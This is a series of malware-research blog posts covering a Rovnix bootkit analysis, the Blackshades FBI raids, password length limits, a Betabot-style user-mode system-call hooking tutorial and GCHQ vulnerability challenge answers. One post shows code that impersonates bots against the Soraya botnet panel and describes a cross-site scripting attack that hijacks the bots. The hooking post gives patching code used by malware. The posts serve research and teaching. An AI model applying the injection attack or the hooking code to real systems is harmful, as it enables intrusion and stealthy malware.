
Rovnix new "evolution"

Rovnix is an advanced VBR (Volume Boot Record) rootkit best known for being the bootkit component of Carberp. The kit operates in kernel mode, uses a custom TCP/IP stack to bypass firewalls, and stores components on a virtual filesystem outside of the partition. Yesterday Microsoft posted an update explaining a new "evolution" to rovnix that had been found.

"evolution"


The so-called Evolution

I'm Melting
The first thing I noticed was that the file "melts" (deletes itself once run, or at least tries to). This is done by a lot of malware to hinder future forensics, but how this sample does it is a little less than elegant.

So advanced

The bot drops a non-hidden batch file to the location it was run from (in my case the desktop). The batch file just runs the "DEL" command in an infinite loop, which uses all of the CPU, until the file is deleted. On my test system the batch file actually fails: the executable locks the file, so it can only be deleted once the executable stops (at reboot), but when the system reboots Windows kills the batch file before the executable, so the file is never deleted.


Initial Infection
Once executed, the packed binary unpacks itself and continues running; the above batch file is deployed to delete the dropper after it runs. For stealth reasons the kit sits idle for an undefined amount of time (I have yet to find out how long), then the system is automatically rebooted. NtShutdownSystem is hooked to receive notifications of shutdowns / reboots, so rebooting the computer manually will result in immediate infection and save you the wait. Amusingly, the packed dropper doesn't exit until reboot and the delay is long enough to attach a debugger, dump the unpacked code from memory, and move it to another computer.

The entire kit is packed inside the dropper, about 13 files in total (32-bit and 64-bit). During the reboot delay everything exists in one continuous block of memory; once dumped, the components can be split up by the byte signature "0x4D 0x5A 0x90" (DOS header).
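
If you want to do the carving programmatically, a minimal sketch looks something like this (the dump file name is whatever you saved from the debugger; the assumption that every component starts with the 3-byte sequence 4D 5A 90 comes from the observation above):

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    if (argc < 2) { printf("usage: %s <dump file>\n", argv[0]); return 1; }

    FILE *f = fopen(argv[1], "rb");
    if (!f) return 1;

    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    fseek(f, 0, SEEK_SET);

    unsigned char *buf = malloc(size);
    fread(buf, 1, size, f);
    fclose(f);

    /* report every offset that looks like a DOS header (MZ + 0x90) */
    for (long i = 0; i + 3 <= size; i++)
        if (buf[i] == 0x4D && buf[i + 1] == 0x5A && buf[i + 2] == 0x90)
            printf("possible PE component at offset 0x%lX\n", i);

    free(buf);
    return 0;
}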


No VBR
The first thing I noticed after infection is that the first 16 sectors of the disk are blank (where the VBR should be located). To anyone familiar with Rovnix this is a common sign of infection, as it uses the kernel driver to hide the infected sectors (which is probably just as suspicious as showing them).
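
A quick way to check for this yourself is to read the first 16 sectors with raw disk access and see whether they come back zeroed. A rough sketch (assumes 512-byte sectors and PhysicalDrive0, and needs administrator rights):

#include <windows.h>
#include <stdio.h>

int main(void)
{
    unsigned char sectors[16 * 512];
    DWORD read = 0;

    /* raw read of the start of the disk, where the author observed the blank sectors */
    HANDLE hDisk = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ,
                               FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                               OPEN_EXISTING, 0, NULL);
    if (hDisk == INVALID_HANDLE_VALUE) return 1;

    if (!ReadFile(hDisk, sectors, sizeof(sectors), &read, NULL)) {
        CloseHandle(hDisk);
        return 1;
    }
    CloseHandle(hDisk);

    int blank = 1;
    for (DWORD i = 0; i < read; i++)
        if (sectors[i] != 0) { blank = 0; break; }

    printf(blank ? "first 16 sectors are blank (suspicious)\n"
                 : "first 16 sectors contain data\n");
    return 0;
}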

Ermahgerd


Stability
The kit appears to run fine on Windows XP 32-bit, but on Windows 7 64-bit it causes the PC to BSOD about every 20 minutes (sometimes the system even gets stuck in an infinite BSOD loop).


Anti Reversing
I can't tell if I'm going crazy or the anti-reversing protection is what I think it is. The driver appears to check for a wide variety of reversing tools (VirtualBox, VMware, Wireshark, OllyDbg, IDA, LordPE, etc.), then disregards the results and exits the thread. My tests appear to confirm this: I've infected a VM with multiple blacklisted tools running and the malware still continues the infection.

The return value will be non-zero if any blacklisted tools are found

Disregard everything?
I've checked through the ASM multiple times, but can't seem to find anything that would result in the bot being any wiser about the environment after the execution of this thread.


Virtual File System
Remember the old Rovnix filesystem, which used raw disk access to store components outside of the filesystem in non-allocated disk space, making it near impossible for an AV to find or remove? Well, that has been "upgraded". The virtual filesystem is now stored inside a file in "C:\system32\", free for the AV to delete at any point (couldn't the coder figure out how to access the virtual filesystem from usermode?). The file name ends in ".bin" and is a 64-bit hex value generated using the time stamp counter ("rdtsc" instruction); all files are encrypted with RC6.

Example File-name Generation
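
As a rough illustration of that naming scheme (hypothetical code, not taken from the sample; assumes the MSVC __rdtsc intrinsic):

#include <stdio.h>
#include <intrin.h>   /* __rdtsc (MSVC); on GCC/Clang use <x86intrin.h> */

int main(void)
{
    unsigned long long tsc = __rdtsc();      /* time stamp counter */
    char name[32];

    /* 64-bit hex value as the file name, ".bin" extension as observed */
    sprintf(name, "%016llx.bin", tsc);
    printf("%s\n", name);
    return 0;
}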

Because the file system is now vulnerable due to it being saved as a standard windows file, the coders have added a high level (and fairly useless) kernel mode rootkit to the driver. The rootkit places SSDT hooks on the following functions:
  • NtQueryDirectoryFile - Hides the file.
  • NtCreateFile - Prevents file from being opened by all except bot.
  • NtOpenFile - Same as above.
  • NtClose - No idea.
  • NtSetInformationFile - Prevents rename / delete.
  • NtDeleteFile - Prevents delete.
  • NtQueryInformationFile - Hides the file.
Additionally the rootkit also hooks some registry functions to hide keys, I can't see any sane reason why.

Each hook entry is an array of 16 bytes (4 double words)


Although this won't protect against antiviruses, it may stop usermode malware and beginner security researchers from tampering with the filesystem.


Usermode Component
This entire bootkit + kernel mode rootkit serves to protect a small trojan which appears to run as a service and do nothing other than log keystrokes and Ammyy IDs to a command and control server. The MD5 hash is: 5e5f3ced234c6f7c91457a875cf4a570.


Conclusion
This isn't the work of common scriptkiddies; it's likely the coder has a moderate knowledge of kernel mode programming. However, the coder is not experienced with malware (using SSDT hooks and filters in a bootkit, having to move the virtual filesystem into a real file to access it from usermode, using a batch file to melt the dropper). This clearly isn't an "evolution" of Rovnix as Microsoft claims; it's just some random coders trying to make the bootkit compatible with their bot.

Thanks to Poopsmith for bringing the sample to my attention and Xylitol for retrieving it for me.


Finally, something to reverse. 



FBI Cybercrime Crackdown - Blackshades

It would seem the FBI is cracking down on cybercrime (well script-kiddies at least), with a bunch of international raids carried out in the past few days and more said to come. As of today it seems that the raids are only targeting users of "blackshades" a popular remote administration tool.



Blackshades is a remote administration tool (RAT) used for remotely accessing and controlling computers over the internet. Although RATs have many legal uses and are sold by software companies, they can also be used for malicious purposes such as data theft, spying and distributed denial of service attacks. Due to the fact that most legitimate RATs require a user to go through the standard installation process, hackers write their own versions that can invisibly infect a computer by running a single executable, this is what blackshades does.


In almost all international law, there is a grey area between what constitutes a legal RAT and an illegal one, as there is no black and white definition that separates software from malware. The authors of blackshades used this grey area to sell their malware for many years with absolutely no legal repercussions. When it comes to the actual use of remote administration tools, the law is pretty clear cut: if you have permission from the owner of the computer, it's legal; if you don't, it's not. Although the sales team were only marketing their product on hacking forums full of criminals, this had few legal implications for them and they made a lot of money. Blackshades was structured a lot like a regular company: they had a website, were registered as an LLC, accepted payments with PayPal through a payment gateway, and kept detailed transaction logs. Most of this led customers to believe that because the software was "legal", what they were doing with it was also legal; as a result most customers paid for the software with their personal accounts, made no effort to cover their tracks, and even posted threads online about how many people they had infected.

Threads with users bragging about how many computers
they had infected are not uncommon.

On Tuesday 13th May 2014 the FBI appears to have begun executing international raids with the help of local law enforcement. Although there appear to have been no arrests as of yet, many users of blackshades have reported police or federal officers entering their homes and confiscating any computer equipment. It is widely believed the FBI came into possession of the transaction log kept by the blackshades staff, which contained personal information of customers such as names, addresses, and IPs. The raids coincide with a statement released by the FBI at the "Reuters Cybersecurity Summit", where they stated they would be taking "a much more offensive approach to cybercrime".

Rickey Gevers also has some interesting information on the raids: http://rickey-g.blogspot.nl/2014/05/international-ongoing-blackshades.html

Update 19th May 2014:
The FBI has released an official statement here, confirming that it was them orchestrating the international raids against blackshades users. The statement also confirms what many suspected for a while now: that Alex Yucel AKA marjinz, the creator of blackshades, had been arrested in Moldova (now awaiting extradition to the US).

Also interesting is that they mention "operation card shop" as what put them onto the scent of blackshades. For those who don't know: Operation Card Shop was an FBI sting operation that involved undercover agents running a carding forum for about 2 years. During the sting operation, "omniscient", the owner of hackforums, urged members to register on the carding forum and even gave the owner a free upgraded account; it was later revealed that the same FBI agent had tried to buy hackforums a few months earlier. A member of the blackshades team, xviceral, fell victim to this trap after he accidentally gave away a free copy of blackshades (complete with free bots) to an undercover FBI agent, in return for vouching for his product.

You can see a copy of the indictments below:
http://www.justice.gov/usao/nys/pressreleases/May14/BlackshadesPR/Blackshades,%20Hogue%20Information%2013%20Cr.%2012.pdf
http://www.justice.gov/usao/nys/pressreleases/May14/BlackshadesPR/Blackshades,%20Yucel%20Indictment%20S1%2013%20Cr%20%20834_Redacted.pdf

Now for the bit I'm sure everyone is waiting for.












A Few Reasons for Maximum Password Lengths

A lot of people have recently been wondering about the reasons behind maximum password lengths, after it was revealed that eBay limited passwords to 20 characters. Many people see this as a security flaw (and in some cases it is), but often there are reasons behind it. I should also mention that I'm not speaking for eBay or any other site; I'm only highlighting some reasons for password limits.



Hashing Algorithms
Take MD5 for example: a few years ago MD5 was one of the most popular hashing algorithms for websites; however, it has quickly gone from a fairly secure algorithm to a big security no-no in the space of a few years. With large companies running huge distributed networks with custom software, it's usually easier said than done to upgrade the system to use a newer hashing algorithm (it can take months and even years to modify all the code required across all the different systems). With that in mind, I'll explain the problem using MD5 and a hypothetical company still using such an algorithm due to a lengthy upgrade process.

MD5 hashes are 16 bytes (32 hexadecimal chars, which are half a byte each) in length and each byte contains 8 bits that can each be zero or one. That is (2^8)^16 or 2 ^ 128 combinations, in decimal: 340,282,366,920,938,463,463,374,607,431,768,211,456 (about 3.4 x 10^38).

Now let's take our theoretical site which has a 20 char password limit. Assuming the password can contain alphanumeric characters, is case sensitive, and allows the use of standard symbols, that's 94 possibilities for each character (94 ^ 20), which in decimal is roughly 2.9 x 10^39.

What have we noticed already? 94 ^ 20 is a far bigger number than 2 ^ 128. Sparing you any more big numbers, a 19 char pass (94 ^ 19) is significantly smaller than 2 ^ 128, so 20 chars is the shortest password length that still (theoretically) produces more combinations than an MD5 hash can.
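
If you'd rather not stare at 40-digit numbers, comparing bit lengths gives the same answer. A small sketch (94 symbols per character, as assumed above):

#include <stdio.h>
#include <math.h>

int main(void)
{
    /* bits of entropy in an n-character password drawn from 94 symbols */
    for (int n = 18; n <= 21; n++)
        printf("%2d chars: %.1f bits (MD5 output is 128 bits)\n",
               n, n * log2(94.0));
    return 0;
}

/* 19 chars is roughly 124.5 bits < 128, 20 chars is roughly 131.1 bits > 128 */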

Because the MD5 algorithm takes input of any length but all hashes are fixed at 16 bytes, multiple passwords can hash to the same value (see: hash collisions, collision attack). That is, your password could be the entire works of Shakespeare, but a hacker bruteforcing the hash could theoretically find a match that is less than 20 characters (making anything longer a waste of resources).

Disclaimer: I use the word "theoretically" because MD5 does not generate hashes in a linear fashion, it is totally possible that multiple 20 char or less passwords could hash to the same value, but no 20 char or less password could hash to a given value; However, allowing more than 20 chars in this case would only slightly improve security as beyond this number collisions are a certainty.

Software Optimization
Let's say our software is written in C and has to hash passwords of variable length; how do we know the length of the password? Well, in C the end of a string is marked by the byte 0x00 (null byte), so to get the length of a string an application has to count each byte until it finds the null byte (slllllooooowwww). To speed things up we could limit passwords to a certain length, then pad all passwords shorter than that with a predefined byte. As a result we only have to handle a buffer of fixed length and don't have to worry about working out the length of someone's novel of a password.
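
A minimal sketch of that idea (the 20 character limit and the padding byte are just example values):

#include <string.h>

#define MAX_PASS 20
#define PAD_BYTE ' '   /* any predefined filler byte works */

/* copy a password into a fixed-size buffer, rejecting anything too long */
int normalize_password(const char *input, char out[MAX_PASS])
{
    size_t len = strlen(input);
    if (len > MAX_PASS)
        return 0;                      /* fail instead of truncating */

    memset(out, PAD_BYTE, MAX_PASS);   /* pad to a fixed length */
    memcpy(out, input, len);           /* note: out is NOT null terminated */
    return 1;
}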

If the software was storing plain-text passwords in a database (terrible idea), a length limit would also be a must because, for reasons I'm not going to explain, databases can be handled more easily and with greater speed if all fields in each row are of fixed length (in a theoretical high speed database, if one person had a 64 char password, every other user in the database would need a 64 char password field to make each row of equal length, which would result in an unnecessarily huge database).

The Ape Condition Problem
Let's say you put 4 apes in a metal cage and hang a banana on a string from the roof. Every time an ape pulls on the banana it triggers a mechanism that electrifies the cage, shocking ALL the apes. Eventually the apes learn that touching the banana results in them all getting electrocuted. You then take one of the apes away and replace it with a new one; as soon as the new ape reaches for the banana, the other 3 apes beat the sh*t out of him. Quickly the new ape learns that touching the banana results in a beat down from the other apes. If slowly over time you keep swapping the apes out until none of the original apes remain, you now have a bunch of apes beating the sh*t out of any ape who touches the banana, and not one of them knows why.

The programming community sometimes works in a similar way. In the past, due to software and hardware limitations, there were many reasons to limit passwords and little reason to have long passwords (poor cracking hardware meant even short password cracking was near impossible). Over time these reasons became invalid, but some programmers continue to implement such limits. Their reason? Other people do it (or some 1990s forum thread tells them they'd be an idiot not to).

Alternate Security Means
A simple problem with people typing long passwords: it's likely they'll make a mistake while typing. Think about credit card PIN numbers: a 4 digit PIN which you're hardly going to mistype. If everyone is limited to a 4 digit PIN, the chances of mistyping or forgetting it are slim, which allows the system to implement harsh security measures such as locking your account after 3 failed attempts.

I should point out that such means of security only apply to systems where password hash databases are unlikely to be leaked, or the cracked database won't result in mass compromise of accounts.


Hacking Soraya Panel - Free Bot? Free Bots!

Some security agencies have been raving about a revolutionary new bot that combines point-of-sale card grabbing (RAM scraping) with form grabbing. The bot is actually not very interesting and pretty simple, but the panel is a great deal of fun (thanks to Xylitol for getting me interested).


By default the panel shows the last 25 connected bots on the index page. Not a very interesting or helpful feature, but it opens up a whole world of possibilities. To understand what is possible, we need to take a look at the code responsible for adding new bots to the database.


From this code we can gather enough information to "impersonate" a bot. The HTTP method is POST, 'mode' must be '1', 'uid' must be a unique number, 'compname' must be a hex encoded string and so must 'osname'. The only difficult part is the fact the panel requires the bot to use a specific user-agent; however, we can find this by reversing a sample of the bot.
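
To make that concrete, here's a rough sketch of such a request using libcurl (the panel URL, user-agent string, and field values are placeholders; only the parameter names and the hex encoding come from the panel code described above):

#include <stdio.h>
#include <string.h>
#include <curl/curl.h>

/* hex-encode a string, as the panel expects for compname/osname */
static void to_hex(const char *in, char *out)
{
    while (*in) { sprintf(out, "%02x", (unsigned char)*in++); out += 2; }
    *out = 0;
}

int main(void)
{
    char comp[128], os[128], post[512];

    to_hex("FAKE-PC", comp);
    to_hex("Windows 7", os);
    snprintf(post, sizeof(post),
             "mode=1&uid=%u&compname=%s&osname=%s", 1337u, comp, os);

    curl_global_init(CURL_GLOBAL_ALL);
    CURL *c = curl_easy_init();
    /* the panel URL and user-agent are placeholders; the real UA comes from
       reversing the bot binary as mentioned above */
    curl_easy_setopt(c, CURLOPT_URL, "http://example.com/panel/gate.php");
    curl_easy_setopt(c, CURLOPT_USERAGENT, "UA-from-bot-sample");
    curl_easy_setopt(c, CURLOPT_POSTFIELDS, post);
    curl_easy_perform(c);
    curl_easy_cleanup(c);
    curl_global_cleanup();
    return 0;
}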

Here I've put together some code to add fake bots to the panel, thus adding entries to the "last 25 connections".


Now, what if we decided to be a bit naughty? Let's try and submit HTML code as the bot's computer name. I'm sure this won't work because nobody is that bad at security, right? RIGHT??


Let's see the result...


Oh dear...

Well, cool. We can submit HTML / JavaScript, but what use is that? Well, we could mess with the botmaster by using JavaScript to redirect him to fbi.gov, replace the entire page with a rickroll, or modify the statistics. But could we hijack all his bots? Turns out the answer is yes!

A quick look at the command page allows us to throw together some code using "XMLHttpRequest()", when executed it will result in an update command being issued to the bot. All we need to do is provide our exe path in urlencoded format.


We could pay for hosting to host our script, only a small price to pay for a lot of free bots. Or, we could just use pastebin... All we need to do now is submit javascript to the panel which will run the code from pastebin.



Once we run it, when the botmaster logs in he will see this on the statistics page (minus the red block over the ip of course)...


The result of him viewing the page will be this....


So it looks like the revolutionary new malware "Soraya" is a little less than revolutionary when it comes to web security. Anyone with a sample of the bot binary can mess with the botmaster or potentially hijack the entire botnet.

Web Security - As easy as 1, 2, 3.


Usermode System Call hooking - Betabot Style

This is literally the most requested article ever; I've had loads of people messaging me about this (after the Betabot malware made it famous). I had initially decided not to do an article about it, because it was fairly undocumented and writing an article may have led to more people using it; however, yesterday someone linked me to a few blogs posting their implementations of the hook code (without explanation), so I've finally decided to go over it seeing as the code is already available.

Win32/64 System Calls

System call is a term used to describe functions that do not execute code in usermode, instead they transfer execution to the kernel where the actual work is done. A good example of these is the native API (Ex: NtCreateFile\ZwCreateFile). None of the functions beginning with Nt or Zw actually do their work in usermode, they simply call into the kernel and allow the kernel mode function with the same name to do their work (ntdll!NtCreateFile calls ntoskrnl!NtCreateFile).

Before entering the kernel, all native functions execute some common code, this is known as KiFastSystemCall on 32-bit windows and WOW32Reserved under WOW64 (32-bit process on 64-bit windows).

Native function call path in user mode under windows 32-bit

Native function call path in user mode under WOW64

As is evident in both examples: Nt* functions make a call via a 32-bit pointer to KiFastSystemCall (x86) or X86SwitchTo64BitMode (WOW64). Theoretically we could just replace the pointer at SharedUserData!SystemCallStub and WOW32Reserved with a pointer to our code; However, in practice this doesn't work.

SharedUserData is a shared page mapped into every process by the kernel, thus it's only writable from kernel mode. On the other hand WOW32Reserved is writable from user mode, but it exists inside the thread environment block (TEB), so in order to hook it we'd have to modify the TEB for every running thread.

KiFastSystemCall Hook

Because SharedUserData is non-writable, the only other place we can target is KiFastSystemCall, which is 5 bytes (enough space for a 32-bit jump). Sadly that turned out not to be the case: the last byte, 0xC3 (retn), is needed by KiFastSystemCallRet and cannot be modified, which leaves only 4 writable bytes.

The sysenter instruction is supported by all modern CPUs and is the fastest way to enter the kernel. On ancient CPUs (before sysenter was invented) an interrupt was used (int 0x2E), for compatibility it was kept in all subsequent versions of windows.

The now obsolete KiIntSystemCall

As you can see, KiIntSystemCall has a glorious 7 writable bytes (enough space for a 32-bit jump and some), and it's also within short jump range of KiFastSystemCall. As you've probably guessed by now, we can do a 2 byte short jump from KiFastSystemCall to KiIntSystemCall and then a 32-bit jump from within KiIntSystemCall to our hook procedure.

Now, what if something calls KiIntSystemCall? Well, it's unlikely, but we can handle that too. The rule for the direction flag on Windows is that it should always be cleared across a call (that is, a function should never assume it is still set after making a call). We can use the first byte of KiIntSystemCall for STD (set direction flag), then use the first byte of KiFastSystemCall for CLD (clear direction flag) followed by a jump to KiIntSystemCall+1; that way our hook procedure can use the direction flag to see which calls came from which function.
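
For reference, the patching side of that scheme could look roughly like this (a sketch assuming 32-bit Windows, where ntdll exports both stubs; the dispatcher itself would be written in assembly, and in a real implementation other threads should be suspended while patching):

#include <windows.h>

/* the actual dispatcher (assembly) is out of scope here; this is only the
   byte-patching part of the scheme described above */
extern void hook_dispatcher(void);

BOOL install_syscall_hook(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    BYTE *fast = (BYTE *)GetProcAddress(ntdll, "KiFastSystemCall");
    BYTE *slow = (BYTE *)GetProcAddress(ntdll, "KiIntSystemCall");
    DWORD old;

    if (!fast || !slow)
        return FALSE;

    VirtualProtect(fast, 16, PAGE_EXECUTE_READWRITE, &old);
    VirtualProtect(slow, 16, PAGE_EXECUTE_READWRITE, &old);

    /* KiIntSystemCall: STD, then a 32-bit relative jump to our dispatcher */
    slow[0] = 0xFD;                                   /* std       */
    slow[1] = 0xE9;                                   /* jmp rel32 */
    *(DWORD *)(slow + 2) = (DWORD)((BYTE *)hook_dispatcher - (slow + 6));

    /* KiFastSystemCall: CLD, then a short jump into KiIntSystemCall+1
       (the two stubs are close enough for an 8-bit displacement) */
    fast[0] = 0xFC;                                   /* cld       */
    fast[1] = 0xEB;                                   /* jmp rel8  */
    fast[2] = (BYTE)((slow + 1) - (fast + 3));

    return TRUE;
}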

WOW32Reserved Hook

This is a lot simpler: either we can keep track of every thread and hook WOW32Reserved in each thread's environment block (I think this is what Betabot does), or we simply overwrite X86SwitchTo64BitMode, which is 7 bytes, writable from user mode, and pointed to by the WOW32Reserved field of every thread's environment block.

Dispatching

Most people who write hooks are used to redirecting one function to another; however, because both of these hooks are placed on common code: every single native function will call the hook procedure. Obviously we're going to need a way to tell NtCreateFile calls from NtCreateProcess and so on, or the process is just going to crash and burn.

If we disassemble the first 5 bytes of any native function it will always be "mov eax, XX"; this value is the ordinal of the function within the System Service Dispatch Table (SSDT). Once the call enters the kernel, a function will use this number to identify which entry in the SSDT to call, then call it (meaning each function has a unique number). When our hook is called, the SSDT ordinal will still be in the eax register, so all we need to do is gather the SSDT ordinals for all the functions we need (by disassembling the first 5 bytes), then compare the number in eax with the ordinal for the function we wish to intercept: if it's equal we process the call, if not we just call the original code.
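
Grabbing the ordinal is trivial; a small sketch assuming the classic 32-bit stub layout (the helper name is mine):

#include <windows.h>

/* Read the SSDT ordinal out of a native stub: the stub starts with
   "mov eax, imm32" (opcode 0xB8), so the ordinal is the next 4 bytes. */
DWORD get_ssdt_ordinal(const char *name)
{
    BYTE *fn = (BYTE *)GetProcAddress(GetModuleHandleA("ntdll.dll"), name);

    if (!fn || fn[0] != 0xB8)
        return (DWORD)-1;            /* unexpected stub layout */

    return *(DWORD *)(fn + 1);
}

/* e.g. get_ssdt_ordinal("NtCreateFile") gives the number placed in eax */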

Comparing the function ordinal with the one we want to hook could be messy, especially if we're hooking multiple functions.

cmp eax, [ntcreatefile_ordinal]
je ntcreatefile_hook
cmp eax, [ntcreateprocess_ordinal]
je ntcreateprocess_hook
[...]
jmp original_code

This code is going to get very long and inefficient the more functions are hooked (because every kernel call is passing through this code, the system could slow down), but there's a better way.

We can build an array of DWORDs in memory (assuming we just want to hook NtCreateFile & NtCreateProcess, let's say the NtCreateFile ordinal is 0x02 and NtCreateProcess ordinal is 0x04), the array would look like this:
my_array+0x00 = (DWORD)NULL
my_array+0x04 = (DWORD)NULL
my_array+0x08 = (DWORD)ntcreatefile_hook_address
my_array+0x0C = (DWORD)NULL
my_array+0x10 = (DWORD)ntcreateprocess_hook_address
[...]

Then we could do something as simple as:
lea ecx, [my_array]
lea edx, [4*eax+ecx] ;edx will be &my_array[eax]
cmp dword [edx], 0
je original_code
call [edx] ;call the address pointed to by edx

This is pretty much what the kernel code for calling the SSDT function by its ordinal would do.

Calling Original Code

As with regular hooking, we just need to store the original code before we hook it. The only difference here is as well as pushing the parameters and calling the original code, the function's ordinal will need to be moved into the eax register.

Conclusion

Feel free to ask any questions in the comments or on our forum, hopefully this post has covered everything already.


A Quick Update

You've probably noticed there have been no articles in quite a while. Part of this is due to a lack of interesting malware samples to look at, but it's mainly because I'm working on a new website. I've decided that MalwareTech has outgrown Blogger and I'm looking to expand the site beyond the features that Blogger has to offer. Currently there is no ETA on the new site and articles, but it shouldn't be more than a few weeks. I'll also be adding a few more creators to contribute to the site and keep the content flowing, as a maximum of 1 - 2 articles per month isn't great for a site with this many readers.

Back Soon, Follow @MalwareTechNet for updates.



Astute Explorer (GCHQ Challenge 1 - 5)

GCHQ has been having trouble finding experienced hackers and programmers to work for them, so they've put out a lot of, admittedly fun, challenges. The idea is that people who do well in the online challenges are selected to do face to face challenges, the top few people from the face to face challenge go through to the masterclass, then the top people from the masterclass will be vetted for a job, finally if you pass the vetting process you get to waste your skill earning 35k/year playing cyber warrior for some NSA wannabes. As you can see, it's better to just use the online challenges to kill some time (You can't even apply for GCHQ unless you're a UK citizen).

Sadly I missed the first challenge, but managed to get into "Astute Explorer" just in time (it's finished now so I'm posting my answers). The scenario is that an imaginary company is under cyber attack and wants you to help secure their software; they have even been kind enough to provide you with random snippets of C code (without any context). Your job is to provide the line number of the vulnerability, explain why it's a vulnerability, and how to patch it. So let's take a look (my area of expertise is malware, so sorry if I end up getting stuff wrong).




Vulnerability
I'm not sure there's an exact line number, but the vulnerability here is pretty obvious. strcpy and strcat don't do any checks to make sure the target buffer is large enough to fit the string, so by providing a username/password that exceeds the size of szTotalString, you can cause a buffer overflow.

Solution
A lot of people would use functions like strlcpy/StringCchCopy, which copy as much data into the buffer as it can fit, then null terminate it. In my opinion this is stupid because the code would still try to check the username and password despite the fact that not all of it was copied. I'd personally do strlen on the username and password, then fail if either exceeds the maximum length.
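
A sketch of that approach (buffer and field sizes are hypothetical):

#include <stdio.h>
#include <string.h>

#define MAX_USER 32
#define MAX_PASS 32

/* the sizes above are examples; the point is to reject oversized input
   before any strcpy/strcat touches the fixed buffer */
int check_credentials(const char *user, const char *pass)
{
    char szTotalString[MAX_USER + MAX_PASS + 2];

    if (strlen(user) > MAX_USER || strlen(pass) > MAX_PASS)
        return 0;                              /* fail, don't truncate */

    snprintf(szTotalString, sizeof(szTotalString), "%s:%s", user, pass);
    /* ... continue with the real check ... */
    return 1;
}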



Vulnerability
This is a fun one, you can chain multiple vulnerabilities in the code to cause a heap overflow. The height and width are user specified, so the first thought would be to specify a height and width so large that it causes an integer overflow when calculating the size on line 94, resulting in the allocated buffer being too small to accommodate board_squared_t. If you look at line 91 it makes sure that the height and width don't exceed a certain size, Foiled! Or not? The mistake here is that height and width are signed integers and if you listened in maths: multiplying 2 negative values gives a positive result. We can bypass the maximum size check by specifying large negative values instead, which will then become positive and still cause our integer overflow.

Solution
Pretty simple, just declare height and width as unsigned integers instead of signed.
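
A sketch of that fix, with an explicit range check done before the multiply so the size calculation can't wrap (the dimension limit and names are hypothetical):

#include <stdlib.h>

#define MAX_DIM 1024   /* hypothetical maximum board dimension */

/* height/width taken as unsigned, with the bound check done before the
   multiplication so the allocation size can't overflow */
void *alloc_board(unsigned int height, unsigned int width, size_t cell)
{
    if (height == 0 || width == 0 || height > MAX_DIM || width > MAX_DIM)
        return NULL;

    /* with both values capped at MAX_DIM the product can't wrap */
    return malloc((size_t)height * (size_t)width * cell);
}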





Vulnerability
I literally have no idea what's going on here. Why is iSize being multiplied by the size of int (4)? What is szBuffer? What does "the number is %d = %d" mean? If someone handed me this code I'd assume they got their degree in a cereal box and send them back to work at Geek Squad. Assuming pszArguments[2] is a string and pszArguments[1] is the length of the string, the memcpy operation on line 556 is going to copy 4x more bytes than the length of the string and probably crash. It should also be noted that iArguments isn't checked, so if the user doesn't specify enough arguments, the application is going to crash.

Solution
Stop doing drugs at work.




Vulnerability
On line 84 szError is passed as the format argument to printf. Because printf will interpret any format specifiers in the format argument, this is unsafe (format string exploit). If the error string were to contain "%d%d%d", the next 12 bytes of memory on the stack would be output to the user; it's also possible to use the %n specifier to write arbitrary data to an arbitrary location.

Solution
printf("%s", szError);



Vulnerability
I wasn't able to find any major vulnerabilities here. The code leaks memory because _strdup allocates a buffer which is never freed. There's also an off-by-one error on line 352: the code checks if the filename is larger than or equal to 3; however, the extensions in the szOkExt array include the dot (4 bytes), so if the user specified a 3 byte filename the code would try to compare 4 bytes and possibly (but unlikely) crash the application.

Solution
Check if cFileName is bigger than 3 and free szLCase before return.

Conclusion

I'm clearly not a hacker.
Other 5 answers coming tomorrow. 

Astute Explorer (GCHQ Challenge 5 - 10)

Continuation for http://www.malwaretech.com/2014/09/astute-explorer-gchq-challenge-1-5.html



Vulnerability
On line 26 the function fails if exactly BLOCK_SIZE is not read, this means if there is data available but less than BLOCK_SIZE is present, or the read fails, the function will return NULL. On failure the function does not free szBuffer so there's a pretty serious memory leak.

Solution
If the read operation fails, the function should free(szBuf) before returning NULL; it is also worth considering handling the event that the read function returns less than BLOCK_SIZE.
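
Something along these lines (the names BLOCK_SIZE and read_input are guessed from the challenge description):

#include <stdlib.h>

#define BLOCK_SIZE 512
extern int read_input(char *buf, int len);   /* stand-in for the challenge's read function */

char *read_block(void)
{
    char *szBuf = malloc(BLOCK_SIZE);
    if (!szBuf)
        return NULL;

    if (read_input(szBuf, BLOCK_SIZE) != BLOCK_SIZE) {
        free(szBuf);      /* don't leak the buffer on a short or failed read */
        return NULL;
    }
    return szBuf;
}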



Vulnerability
I have a hard time understanding the point of this function (it reads the data into a local buffer, which is then discarded on return), but I'm sure making the function useful is not part of the assignment. The problem exists on line 1009: assuming GetFromInput can read more than 1 byte at a time, it can still exceed MAX_RECEIVE. For example, if MAX_RECEIVE is 10 and GetFromInput reads 20 bytes, siBytesReceived is going to be 20; the loop will exit but the data will have already been written and siBytesReceived will already have exceeded the limit. There's also the problem that if GetFromInput can fail or return less than MAX_RECEIVE, the loop has no way of checking this and will continue looping (possibly infinitely).

Solution
The best idea would be to implement a parameter in GetFromInput that allows the user to specify the maximum amount of data to read in a single call. The function can then calculate how much data is left before MAX_RECEIVE is hit and specify a limit to prevent more than that from being read.




Vulnerability
I wasn't able to find any major vulnerabilities here, unless the user supplies invalid pointers to the function (and it should be their job to check they're valid, not the function's). On line 45 the loop will decrement len until it's 0 then exit; as a result the function will always return 0.

Solution
Make a copy of len and then decrement the copy.
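
For example (a hypothetical function, since the original snippet isn't reproduced here):

/* checksum-style loop that works on a copy of len, so the length the caller
   passed in is still meaningful when the function returns */
unsigned int sum_bytes(const unsigned char *data, unsigned int len)
{
    unsigned int remaining = len;   /* decrement the copy, not len itself */
    unsigned int sum = 0;

    while (remaining--)
        sum += *data++;

    return sum;
}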





Vulnerability
If the aim of this code was to use obscure nested if/else statements to make code auditing almost impossible, then the programmer (who probably works on the security team at Oracle) did a great job. I'm really not sure what's going on with the code, or what err is and where it's set. Assuming err is an actual variable and not pseudo-code, a runtime library function like malloc wouldn't set it; if malloc returns NULL the application is going to try and use that null pointer. There's also the issue of the use-after-free on line 52: on error ptr is freed and abrt is set, which means logError will always be passed ptr after it has been freed.

Solution
Stop hiring college kids.




Vulnerability
This piece of code should be instantly recognizable as the Apple SSL bug from February (it was all over the news and security sites for months). The extra goto fail; on line 408 means the application will always skip to the cleanup code without setting err; as a result the client doesn't verify that the server owns the private key matching the certificate, which opens the client up to MITM attacks.

Solution
Remove the extra goto fail;
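
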